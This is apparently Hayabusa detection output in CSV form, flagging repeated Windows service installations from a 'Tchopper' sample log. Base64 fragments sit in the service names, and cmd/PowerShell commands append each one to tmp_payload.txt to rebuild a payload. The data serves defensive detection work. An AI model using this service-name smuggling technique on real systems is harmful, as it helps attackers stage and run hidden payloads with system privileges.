2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
